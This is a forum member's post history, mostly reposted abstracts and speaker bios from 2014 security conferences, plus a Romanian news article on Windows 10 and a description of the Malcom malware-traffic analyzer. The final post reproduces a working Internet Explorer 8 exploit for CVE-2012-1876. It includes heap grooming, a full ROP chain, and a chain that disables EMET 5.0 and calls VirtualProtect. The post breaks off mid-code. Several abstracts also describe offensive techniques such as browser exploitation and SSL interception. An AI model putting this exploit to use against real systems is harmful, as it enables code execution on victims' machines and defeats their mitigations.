-
Posts
18801 -
Joined
-
Last visited
-
Days Won
745
Everything posted by Nytro
-
Hacking 802.11 Basics - textile Hacking 802.11 Basics - textile Bio: Some dude. Via: Hacking 802.11 Basics - textile (Defcon Wireless Village 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
-
802.11ac Evolution: Data rates and Beamforming - Eric Johnson This session will discuss what is new in 11ac Discuss how the new data rates are derived. Where does 1.3 Gbps come from? The latest 11ac standard introduced 11ac beamforming. What is beamforming at a basic level? The practicalities of how 11ac beamforming works. Why it is not about making pretty antenna patterns? How it is different than proprietary analog solutions that proceeded the standards solution? Bio: Eric Johnson is one of Aruba's radio subject matter experts. He holds a Bachelor's and Master's degree in Electrical Engineering (Electromagnetics) from Carleton University. He has contributed solely and with teams on a total of 7 patents. His career now spans 26 years of defining, designing, building, and selling high performance radio and antenna solutions. He has contributed to and driven solutions for; space and terrestrial based remote sensing solutions; antenna designs from 30 MHz to 60 GHz; and at Nortel as architect on cellular radios, basestations, and antennas. Eric joined the Aruba Networks team in 2011 as the Product Manager for outdoor radio solutions and most recently delivered the AP-270 outdoor 11ac Access Point solutions. Via: 802.11ac Evolution: Data rates and Beamforming - Eric Johnson (Defcon Wireless Village 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Mobile Forensics and Its App Analysis - Dr. Charline Nixon This presentation will talk about different mobile forensic tools, its uses, pros and cons. I will also use attack tree and its forensic tools comparison. The discussion also include app analysis, vulnerabilities, and breaches of mobile phone analysis. Bio: Charline F. Nixon is currently an IT Faculty at Calhoun Community College where she is responsible for teaching computer forensics, cyber terrorism and ethical hacking courses. She is currently developing a new course focused on mobile device hacking and forensics. Her previous positions include, IT School Chair and IT Faculty Lead Instructor. She holds 2 PhD’s in Education and Management and 2 Masters in Business and Cyber Security and a Black Belt Six Sigma. Charline has previously spoken at BSides Memphis and is one of the co-organizers of BSides Huntsville. In addition she holds several IT certifications, including GCIA, CEH, CHFI, ECSA, MFE,MCT, MCP,CASP (+10 others). Via: Mobile Forensics and Its App Analysis - Dr. Charline Nixon (TakeDownCon Rocket City 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
-
IPv6 Attack tools - Scott Hogg Many international organizations already have IPv6 networks, some organizations are working on their transitions to IPv6 and others are contemplating what IPv6 means to them. However, many organizations already have IPv6 running on their networks and they don’t even realize it. Many computer OSs now default to running both IPv4 and IPv6 which could lead to security vulnerabilities if one is not prepared. IPv6 security vulnerabilities currently exist “in the wild” and as the popularity of the IPv6 protocol increases so will the number of threats. This session will cover the overview of IPv6 security threats and protection measures. This session will cover recently released IPv6 attack tools that target the Neighbor Discovery Protocol (NDP) and how Ethernet switch manufacturers have created protection measures. Bio: Scott Hogg is the CTO for Global Technology Resources, Inc. (GTRI), a founding member of the Rocky Mountain IPv6 Task Force, and a member of the Infoblox IPv6 Center of Excellence. Scott has a B.S. in Computer Science, a M.S. in Telecommunications, along with his CCIE (#5133), CISSP (#4610), among many other vendor and industry certifications. Scott has authored the Cisco Press book on IPv6 Security and writes a popular blog for NetworkWorld.com. Scott helps enterprises and service providers with their IPv6 planning, training and deployment activities. Via: IPv6 Attack tools - Scott Hogg (TakeDownCon Rocket City 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
-
- 1
-
-
Dropping Docs on Darknets: How People Got Caught Most of you have probably used Tor before, but I2P may be unfamiliar. Both are anonymization networks that allow people to obfuscate where their traffic is coming from, and also host services (web sites for example) without it being tied back to them. This talk will give an overview of both, but will focus on real world stories of how people were deanonymized. Example cases like Eldo Kim & the Harvard Bomb Threat, Hector Xavier Monsegur (Sabu)/Jeremy Hammond (sup_g) & LulzSec, Freedom Hosting & Eric Eoin Marques and finally Ross William Ulbricht/“Dread Pirate Roberts” of the SilkRoad, will be used to explain how people have been caught and how it could have been avoided Bio: Adrian Crenshaw has worked in the IT industry for the last fifteen years. He runs the information security website Irongeek.com, which specializes in videos and articles that illustrate how to use various pen-testing and security tools. He did the cert chase for awhile (MCSE NT 4, CNE, A+, Network+. i-Net+) but stopped once he had to start paying for the tests himself. He holds a Master of Science in Security Informatics and is also one of the co-founders of Derbycon. Via: Dropping Docs on Darknets: How People Got Caught (TakeDownCon Rocket City 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Energy-efficient bcrypt cracking - Katja Malvoni Abstract:Bcrypt is not completely hardware resistant: certain low-power parallel platforms improve bcrypt cracking energy-efficiency by a factor of 20+ when compared to traditional CPU implementations. https://www.youtube.com/watch?list=PLdIqs92nsIzRFk0OCN_uQiOkgtPiNk2mv&feat ure=player_embedded&v=maq2IY1F3x8 Via: Energy-efficient bcrypt cracking - Katja Malvoni (Passwords Con 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Net hashes: a review of many network protocols - Robert Graham https://www.youtube.com/watch?list=PLdIqs92nsIzRFk0OCN_uQiOkgtPiNk2mv&feat ure=player_embedded&v=dM3n1Vff2xs Via: Net hashes: a review of many network protocols - Robert Graham (Passwords Con 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
-
I have the #cat so I make the rules - Yiannis Chrysanthou Abstract:The presentation will be a demonstration of new techniques for wordlist and rule generation to help crack quality passwords with a success rate above 90%. Bio:Yiannis works at KPMG LLP (UK) as a pentester. He managed to convince the Academia that his password cracking obsession is a good subject for an MSc thesis . In his MSc thesis he listed practical attacks on passwords and applied them against hashes disclosed from recent leaks. Yiannis argued that usage of standards such as FIPS181 (pronounceable random passwords) actually weakens password strength. Yiannis is an active member of Team Hashcat and has attended CMIYC and Hashrunner competitions. He is well known for his rulesets and wordlists. He makes his own rules both in life and password cracking! He recently presented at various seminars such as OWASP Chapters and BSides London. He was interviewed on the subject of password cracking by BBC and ArsTechnica. https://www.youtube.com/watch?list=PLdIqs92nsIzRFk0OCN_uQiOkgtPiNk2mv&feat ure=player_embedded&v=4fMwhSlC9HM Via: I have the #cat so I make the rules - Yiannis Chrysanthou (Passwords Con 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Tradeoff cryptanalysis of password hashing schemes - Dmitry Khovratovich, Alex Biryukov, Johann Großschädl Abstract:We explore time-memory tradeoffs for the most promising password hashing schemes in the context of brute-force password cracking on ASIC, FPGA, and GPU. Bio:Alex Biryukov is a professor at the University of Luxembourg and the head of Laboratory of Algorithms, Cryptology, and Security (LACS). Dmitry Khovratovich is a post-doctoral researcher at LACS. Alex and Dmitry are professional cryptanalysts, known for their works on the world standard cipher AES, hash function SHA-2, and tradeoff attacks on stream ciphers, which have been published at flagship crypto conferences. Johann Großschädl is a researcher at LACS with a focus on efficient implementation of cryptographic primitives in hardware and software. In the past 15 years, he has published about 80 papers in these areas, including 9 papers in the workshop series on Cryptographic Hardware and Embedded Systems (CHES). LdIqs92nsIzRFk0OCN_uQiOkgtPiNk2mvVia: Tradeoff cryptanalysis of password hashing schemes - Dmitry Khovratovich, Alex Biryukov, Johann Großschädl (Passwords Con 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Using cryptanalysis to speed-up password cracking - Christian Rechberger Abstract:Cryptanalysts try to find collisions or preimages. Password crackers look for the most effective way to search through candidate passwords. So far there was no useful practical overlap: We change that! Bio:Assoc. Prof. at Technical University of Denmark. Co-designer of SHA-3 finalist Grostl, block cipher Prince, and co-inventor of various attack techniques for ciphers and hash functions like AES and SHA-1. https://www.youtube.com/watch?feature=player_embedded&list=PLdIqs92nsIzRFk 0OCN_uQiOkgtPiNk2mv&v=O7u8S2jxTns Via: Using cryptanalysis to speed-up password cracking - Christian Rechberger (Passwords Con 2014) (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Hackers Are People Too Amanda Berlin (Infosystir) Derbycon 2014 The world and popular culture mostly see hackers as criminals. We should all make it our mission to not only educate each other when it comes to technology and practices, but also education the population on what we do and why we do it. Let’s spread the word on all of the amazing things that our community does and has to offer to shine a better light on the word “hackerâ€. I go through the responses of my local community and circles of family and friends as well as what I’ve learned in the process. Hopefully the word spreads and it empowers us to secure all the things!!! Via: Hackers Are People Too - Amanda Berlin (Infosystir) Derbycon 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
-
How to Secure and Sys Admin Windows like a Boss. Jim Kennedy Derbycon 2014 Last year we looked at some of the specifics of how to secure a windows network from 6000 hostile users with domain creds. Those users are still there- still hostile and still hell bent on breaking our stuff. I will recap the security measures we have in place and expand upon the specifics of the important ones. But there is also a holistic approach to building an Active Directory Domain from the bottom up so that security is built in- just like software design. As I have learned more about the attack vector I have realized that following best practices in design- that on first glance appear to have little security value- do in fact build the foundation of our ongoing success at beating back the attackers. You can’t build a house on quicksand. Via: How to Secure and Sys Admin Windows like a Boss. - Jim Kennedy Derbycon 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Interceptor: A PowerShell SSL MITM Script Casey Smith Derbycon 2014 This talk will take you line by line through creating an SSL Man-In-The-Middle Powershell script. Modern malware often aims to steal web credentials and inject code into secure sessions. This script can be used to mimic that behavior, and expand your influence by collecting web credentials, or injecting “additional functionality” into a user’s web experience. In addition, you can mimic the behavior of applications such as Burp or Fiddler by extending or customizing this script. Topics covered include Dynamic CA and Signed Certificate Generation. PowerShell Sockets, Streams, Threads and SSL/TLS Interception and Tampering. Via: Interceptor: A PowerShell SSL MITM Script - Casey Smith Derbycon 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Exploiting Browsers Like A Boss w/ WhiteLightning! Bryce Kunz Derbycon 2014 Have you ever performed a spear-phishing attack where you failed to gain access to your target even though you know your target was exploitable to an old browser exploit? Selecting the wrong browser exploit or the wrong callback port for your payload can make for a very sad panda. Well cry no more sad panda- because WhiteLightning solves your exploitation problems! WhiteLightning is a browser exploitation frame - work that stealthily detects accurate versioning information from an endpoint’s browser and intelligently selects the best browser exploits to gain access to the remote endpoint. WhiteLightning directly interfaces with Metasploit via MS - GRPC to accurately start exploits- payloads- and handlers in real-time. Ready for the best part? Using some slick trickery I will show you how to use WhiteLightning and Metasploit together to exploit endpoint browsers all over a single TCP port using valid HTTP requests! Say goodbye to blocked callbacks and unreliable browser exploitation because we’re about to 0wn some targets with WhiteLightning!!! Via: Exploiting Browsers Like A Boss w/ WhiteLightning! - Bryce Kunz Derbycon 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Burp For All Languages Tom Steele Derbycon 2014 This talk will mark the an official release and demonstration a new tool which exposes the entire BurpSuite Extender API over a combination of HTTP and WebSockets. BurpSuite is a great tool for application security assessments and the Burp Extender API exposes an extraordinary amount of functionality for users to build their own plugins. However, these plugins must be written in Java, Python, or Ruby. Additionally, restrictions on these languages while running on the JVM can be frustrating. By executing via HTTP and WebSockets, plugins can be written in any language and can run entirely independent from BurpSuite, allowing for unlimited functionality. We will discuss the previous projects which inspired this, functionality of the API, and some client demonstrations written in various languages. Some practical and some that are just awesome for the sake of being awesome. Via: Burp For All Languages - Tom Steele Derbycon 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
-
How not to suck at pen testing John Strand Derbycon 2014 Godamitsomuch. How did printing a report from a vuln scan - ner qualify as a “pen test”? Why are your testers ignoring low and informational findings? In this presentation, John will cover some key components that many penetration tests lack, including why it is impor - tant to get caught, why it is important to learn from real attackers and how to gain access to organizations without sending a single exploit, and how to look for other attackers on the network. Additionally, John will show you how to bypass “all powerful” white listing applications that are often touted as an impenetrable defense. Via: How not to suck at pen testing - John Strand Derbycon 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Making BadUSB Work For You Adam Caudill - Brandon Wilson Derbycon 2014 Your average USB thumb drive can be so much more than meets the eye. There’s been some fear spread recently about how they can be used as an attack vector- but little information about how you can take advantage of them. This talk dispels some of the fear- and introduces users to how they can leverage a low cost thumb drive to attack systems and hide data. During the talk- new tools- code- and documentation will be publicly released to allow anyone to take advantage of these techniques. Via: Making BadUSB Work For You - Adam Caudill - Brandon Wilson Derbycon 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
-
The Social Engineering Savants - The Psychopathic Profile Kevin Miller Derbycon 2014 Some people are good at convincing others. Some have a knack for it- but there is a class of people who truly excel. Is this because of the right circumstances in their upbringing? Is it their interests- or do they have a true advantage the rest of society can’t achieve? Psychopaths are experts at charm and deception. They have a true advantage most people cannot hope to gain- but their advantage is also their weakness. Although their behavior and calm demeanor gives them the upper hand in dealing with people- their desire for high risk situations also gives them away to what they really are. The question becomes who are they- and what makes them different. With those that are different- what differentiates them between being violent and high functioning. Almost everyone has met one- they question is who are they- and are they really your friend? Via: The Social Engineering Savants - The Psychopathic Profile - Kevin Miller Derbycon 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
-
NoSQL Injections: Moving Beyond 'or '1'='1' Matt Bromiley Derbycon 2014 Gone are the days of SELECT *... Hadoop- Mongo- Elastic - search. NoSQL databases are all the rage these days- as companies migrate some- if not all- of their data to these new storage types. As infosec practitioners encounter these bad boys- we need to know what to do with them. This talk will combine viewpoints of NoSQL injections and the footprints left behind. Using MongoDB as an example- attendees will be shown basic Mongo operations and through log analysis- determine which operations are logged and which are not. We’ll then build up our NoSQL injection skills- making Mongo and Elasticsearch sing. Attendees should be prepared to learn some neat NoSQL tricks- and proceed comfortably knowing what’s logged and what’s not. Via: NoSQL Injections: Moving Beyond 'or '1'='1' - Matt Bromiley Derbycon 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Bypassing Internet Explorer's XSS Filter Carlos Munoz Derbycon 2014 There is a known flaw in the built-in anti-reflective Cross Site Scripting filter in Microsoft’s Internet Explorer web browser. This is a flaw that Microsoft knows about- but has decided that it will not be fixed. Bring your laptop with a Windows VM and learn how to perform this bypass. Via: Bypassing Internet Explorer's XSS Filter - Carlos Munoz Derbycon 2014 (Hacking Illustrated Series InfoSec Tutorial Videos)
-
Microsoft a prezentat Windows 10 R?zvan B?lt?re?u 30-09-2014 Windows 10 este noul Windows prezentat de Microsoft. Nu se va numi Windows 9, cum s-a vehiculat, ci Windows 10 ?i va fi pentru toate tipurile de sisteme de calcul folosite în prezent. FOTO The Verge Windows 10 a fost prezentat în aceast? sear? la San Francisco de c?tre Microsoft. Noua versiune nu este radical schimbat? fa?? de restul, ci integreaz? acele nout??i aduse de Windows 8 cu cele disponibile în vechile versiuni. Practic, Windows 10 este versiunea care s? aduc? toate metodele de input mai aproape ?i s? uniformizeze experien?a de utilizare. Relatare livetext din timpul conferin?ei Microsoft Evenimentul Microsoft de lansare a Windows 10 s-a desf??urat în San Francisco. Locul a fost împânzit cu bannere cu Windows, cu computere pe care va fi demonstrat cel mai nou sistem de operare ?i scena e preg?tit? pentru marele anun?. „Circa 1,5 miliarde de oameni folosesc Windows“, a?a ?i-a început Terry Myerson, ?eful diviziei Windows, prezentarea. Cu siguran?? sunt mul?i, cu siguran?? Windows 9 va face cumva s? fie ?i mai mul?i. „Windows a ajuns în prag (n.r.: Threshold) ?i e timpul pentru un nou Windows“, a continuat acesta. Acesta spune c? noul Windows trebuie construit cu gândul la o lume axat? pe dispozitive mobile. „Care ar trebui s? fie numele acestuia?“, s-a întrebat retoric. El a spus c? noul Windows ar trebui s? se numeasc? Windows One. „Dar Windows 1 a fost f?cut deja. ?i n-ar fi corect s?-i spun Windows 9“, a continuat. „Noul Windows se va numi Windows 10“, a comunicat el numele. „Windows 10 va rula pe cele mai noi ?i mai diferite dispozitive care exist? în acest moment“, a spus ?eful Windows. „Vom livra experien?a potrivit? la timpul potrivit. Windows 10 va fi cea mai complex? platform? pe care am lansat-o vreodat?“. „Windows 10 va fi compatibil cu toate sistemele folosite în prezent“, a mai spus ?eful Windows. Este o platform? dezvoltat? pentru a îngloba tot ceea ce Microsoft a prezentat în ultimii ani. De asemenea, are func?ionalit??i noi ?i pentru segmentul enterprise, dup? cum se vede în poza de mai jos. În noul Windows, denumit Windows 10, po?i redimensiona live tile-urle, îl po?i personaliza mai mult decât s-a putut pân? acum cu Windows 8 sau Windows 7 ?i revine într-o anumit? form? meniul Start. Este vorba de optimizare a noului sistem de operare pentru toate dispozitivele pe care le pot folosi utilizatorii. Cel care l-a prezentat a fost Joe Belfiore, ?eful diviziei Windows Phone de la Microsoft. „Tile-urile ?i pictogramele prezente în sistemul de operare sunt o îmbinare a aplica?iilor clasice cu cele universale (n.r.: din Modern UI)“, a spus Belfiore. De asemenea, în Windows 10 func?ioneaz? foarte bine Snap View din Windows 8. Acum, func?ioneaz? ?i cu aplica?ii clasice, nu doar cu cele noi. Dup? cum se vede, este o îmbinare reu?it? între ceea ce ?tii pe Windows 7 ?i ceea ce poate face Windows 8. „Ceea ce dorim s? facem în Windows 10, unul dintre lucrurile pe care punem accentul, este s? îi înv???m pe utilizatorii novici s? se descurce mai bine în multitasking“, a spus Belfiore. Ceea ce el a prezentat este o noutate pe care Apple o folose?te de ceva timp ?i o nume?t Expose. Practic, este un task manager foarte bun, u?or de folosit. De remarcat îns? c? la baza ecranului sunt mai multe desktop-uri ?i po?i vedea toate aplica?iile care ruleaz? în acela?i timp. Desktop-urile multiple este una dintre nout??ile semnificative din Windows 10. Exist? în Windows 10 ceea ce se nume?te Snap Assist, unde po?i trece o aplica?ie dintr-un desktop în altul. Este o func?ionalitate introdus? mai ales pentru power users. Belfiore a spus c? aceast? func?ionalitate va cre?te nivelul de productivitate. Belfiore a mai vorbit ?i despre cum Windows 10 integreaz? toate acele metode de input, astfel încât s? func?ioneze eficient petnru toat? lumea. „Asta este experien?a de utilizare din Windows 10. Nu vom vorbi despre func?ionalit??ile orientate spre consumatorul obi?nuit despre care vom discuta mai târziu“, a spus Belfiore. Au schimbat chiar ?i command prompt. Joe Belfiore nu a uitat de utilizatorii cu dispozitive dotate cu ecrane tactile. „Avem nevoie de ceva care func?ioneaz? atât pentru utilizatorii de Windows 7, cât ?i pentru cei de Windows 8“, a spus Belfiore. Astfel, în Windows 10 când execu?i un swipe de la stânga vei vedea programele active. Diferen?ele sunt acum la nivel vizual, mult mai u?or s? interac?ionezi cu acestea fa?? de cele din Windows 8, când ap?reau pe o margine neagr? în stânga. Windows 10 va fi livrat abia în 2015, iar mai multe detalii despre func?ionalit??ile destinate consumatorilor obi?nui?i vor fi oferite la conferin?a Build din aprilie 2015. Sursa: Microsoft a prezentat Windows 10
-
[h=1]Malcom - Malware Communication Analyzer[/h] Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic. This comes handy when analyzing how certain malware species try to communicate with the outside world. Malcom can help you: detect central command and control (C&C) servers understand peer-to-peer networks observe DNS fast-flux infrastructures quickly determine if a network artifact is 'known-bad' The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network. Convert network traffic information to actionable intelligence faster. Check the wiki for a Quickstart with some nice screenshots and a tutorial on how to add your own feeds. Graph for the host tomchop.me. [h=2]Quick how-to[/h] Install Elevate your privileges to root (yeah, I know, see disclaimer) Start the webserver with ./malcom.py (or see options with ./malcom.py --help) ** Default port is 8080 To have a dedicated process for analytics, run ./malcom.py --analytics To have a process dedicated to feeding, run ./malcom.py --feeds ** Alternatively, run the feeds from celery. See the feeds section for details on how to to this. Sursa: https://github.com/tomchop/malcom
-
[h=1]Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037)[/h] <!-- ** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass ** Exploit Coded by sickness || EMET 5.0 bypass by ryujin ** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ ? ** Affected Software: Internet Explorer 8 ** Vulnerability: Fixed Col Span ID ** CVE: CVE-2012-1876 ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0 --> <html> <body> <div id="evil"></div> <table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table> <script language='javascript'> function strtoint(str) { return str.charCodeAt(1)*0x10000 + str.charCodeAt(0); } var free = "EEEE"; while ( free.length < 500 ) free += free; var string1 = "AAAA"; while ( string1.length < 500 ) string1 += string1; var string2 = "BBBB"; while ( string2.length < 500 ) string2 += string2; var fr = new Array(); var al = new Array(); var bl = new Array(); var div_container = document.getElementById("evil"); div_container.style.cssText = "display:none"; for (var i=0; i < 500; i+=2) { fr[i] = free.substring(0, (0x100-6)/2); al[i] = string1.substring(0, (0x100-6)/2); bl[i] = string2.substring(0, (0x100-6)/2); var obj = document.createElement("button"); div_container.appendChild(obj); } for (var i=200; i<500; i+=2 ) { fr[i] = null; CollectGarbage(); } function heapspray(cbuttonlayout) { CollectGarbage(); var rop = cbuttonlayout + 4161; // RET var rop = rop.toString(16); var rop1 = rop.substring(4,8); var rop2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 11360; // POP EBP var rop = rop.toString(16); var rop3 = rop.substring(4,8); var rop4 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 111675; // XCHG EAX,ESP var rop = rop.toString(16); var rop5 = rop.substring(4,8); var rop6 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12377; // POP EBX var rop = rop.toString(16); var rop7 = rop.substring(4,8); var rop8 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 642768; // POP EDX var rop = rop.toString(16); var rop9 = rop.substring(4,8); var rop10 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12201; // POP ECX --> Changed var rop = rop.toString(16); var rop11 = rop.substring(4,8); var rop12 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 5504544; // Writable location var rop = rop.toString(16); var writable1 = rop.substring(4,8); var writable2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12462; // POP EDI var rop = rop.toString(16); var rop13 = rop.substring(4,8); var rop14 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 12043; // POP ESI --> changed var rop = rop.toString(16); var rop15 = rop.substring(4,8); var rop16 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 63776; // JMP EAX var rop = rop.toString(16); var jmpeax1 = rop.substring(4,8); var jmpeax2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 85751; // POP EAX var rop = rop.toString(16); var rop17 = rop.substring(4,8); var rop18 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 4936; // VirtualProtect() var rop = rop.toString(16); var vp1 = rop.substring(4,8); var vp2 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX] var rop = rop.toString(16); var rop19 = rop.substring(4,8); var rop20 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 234657; // PUSHAD var rop = rop.toString(16); var rop21 = rop.substring(4,8); var rop22 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 408958; // PUSH ESP var rop = rop.toString(16); var rop23 = rop.substring(4,8); var rop24 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2228408; // POP ECX var rop = rop.toString(16); var rop25 = rop.substring(4,8); var rop26 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1586172; // POP EAX var rop = rop.toString(16); var rop27 = rop.substring(4,8); var rop28 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX] var rop = rop.toString(16); var rop29 = rop.substring(4,8); var rop30 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1884912; // PUSH EAX var rop = rop.toString(16); var rop31 = rop.substring(4,8); var rop32 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2140694; // ADD EAX,ECX var rop = rop.toString(16); var rop33 = rop.substring(4,8); var rop34 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX var rop = rop.toString(16); var rop35 = rop.substring(4,8); var rop36 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 5036248; // ADD ESP,0C var rop = rop.toString(16); var rop37 = rop.substring(4,8); var rop38 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX var rop = rop.toString(16); var rop39 = rop.substring(4,8); var rop40 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI var rop = rop.toString(16); var rop41 = rop.substring(4,8); var rop42 = rop.substring(0,4); // } RET var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX var rop = rop.toString(16); var rop43 = rop.substring(4,8); var rop44 = rop.substring(0,4); // } RET var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW var getmodulew = getmodulew.toString(16); var getmodulew1 = getmodulew.substring(4,8); var getmodulew2 = getmodulew.substring(0,4); // } RET var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING shellcode+= unescape("%u4141%u4141"); // PADDING shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN // EMET disable part 0x01 // Implement the Tachyon detection grid to overcome the Romulan cloaking device. shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u10c4%u076d"); // EMET_STRING_PTR (GetModuleHandle argument) shellcode+= unescape("%ua84c%u000a"); // EMET_CONFIG_STRUCT offset shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI shellcode+= unescape("%u10c0%u076d"); // MEM_ADDRESS_PTR (Store EMET base address here for later) shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT) shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX] shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI shellcode+= unescape("%u104c%u076d"); // Get fake DecodePointer argument from the stack and update it with the encoded value shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN shellcode+= unescape("%u10c0%u076d"); // Get EMET base address Ptr shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX] shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u80b0%u0004"); // Get DecodePointer offset from the stack shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT) shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX] shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI shellcode+= unescape("%u9090%u9090"); // Fake DecodePointer argument (Will be patched) shellcode+= unescape("%u10bc%u076d"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later) shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u0558%u0000"); // ROP Protections offset shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN shellcode+= unescape("%u0000%u0000"); // NULL shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN // EMET disable part 0x01 end // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain) shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP shellcode+= unescape("%u1024%u0000"); // Size 0x00001024 shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX shellcode+= unescape("%u0040%u0000"); // 0x00000040 shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect() shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX] shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP // Store various pointers here shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u14eb"); // NOPs shellcode+= unescape("%u4242%u4242"); // Decoded CONFIG structure pointer shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack* shellcode+= "EMET"; // EMET string shellcode+= unescape("%u0000%u0000"); // EMET string shellcode+= unescape("%u9090%u9090"); // NOPs shellcode+= unescape("%u9090%u9090"); // NOPs // Store various pointers here // EMET disable part 0x02 // MOV EAX,DWORD PTR DS:[076D10BCH] // MOV ESI,DWORD PTR [EAX+518H] // SUB ESP,2CCH // MOV DWORD PTR [ESP],10010H // MOV EDI,ESP // MOV ECX,2CCH // ADD EDI,4 // SUB ECX,4 // XOR EAX,EAX // REP STOS BYTE PTR 